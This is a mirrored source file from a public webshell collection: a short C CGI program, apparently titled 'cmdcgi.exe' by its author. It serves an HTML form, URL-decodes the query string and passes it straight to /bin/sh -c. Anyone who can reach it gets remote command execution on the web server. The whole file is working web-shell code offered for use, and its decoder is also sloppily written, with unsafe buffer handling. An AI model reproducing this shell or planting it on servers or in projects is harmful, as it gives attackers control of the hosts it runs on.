mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
74 lines
1.3 KiB
C
74 lines
1.3 KiB
C
//
|
|
// cmdcgi.exe 0.1 darkraver (12/05/2005)
|
|
//
|
|
|
|
#include <stdio.h>
|
|
|
|
|
|
char *uri_decode(char *uri) {
|
|
int i=0;
|
|
int ptr=0;
|
|
char *command;
|
|
char hexa[3];
|
|
char code;
|
|
|
|
command=(char *)malloc(strlen(uri));
|
|
|
|
for(i=0;i<strlen(uri);i++) {
|
|
|
|
switch(*(uri+i)) {
|
|
case '+':
|
|
*(command+ptr)=' ';
|
|
ptr++;
|
|
break;
|
|
case '%':
|
|
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
|
|
i+=2;
|
|
//printf("HEXA: %s\n", hexa);
|
|
sscanf(hexa, "%x", &code);
|
|
//printf("CODE: %c\n", code);
|
|
*(command+ptr)=code;
|
|
ptr++;
|
|
break;
|
|
default:
|
|
*(command+ptr)=*(uri+i);
|
|
ptr++;
|
|
break;
|
|
}
|
|
|
|
}
|
|
|
|
*(command+ptr)='\0';
|
|
|
|
return command;
|
|
|
|
}
|
|
|
|
|
|
int main(int argc, char **argv) {
|
|
char *cmd;
|
|
|
|
printf("Content-type: text/html\n\n");
|
|
printf("<html><body>\n");
|
|
|
|
cmd=(char *)getenv("QUERY_STRING");
|
|
|
|
if(!cmd || strlen(cmd)==0) {
|
|
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
|
|
printf("<input type=\"text\" name=\"cmd\">");
|
|
printf("<input type=\"submit\" value=\"Send\">");
|
|
printf("<br><br><hr></form>");
|
|
} else {
|
|
//printf("QUERY_STRING: %s\n", cmd);
|
|
cmd+=4;
|
|
cmd=uri_decode(cmd);
|
|
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
|
|
fflush(stdout);
|
|
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|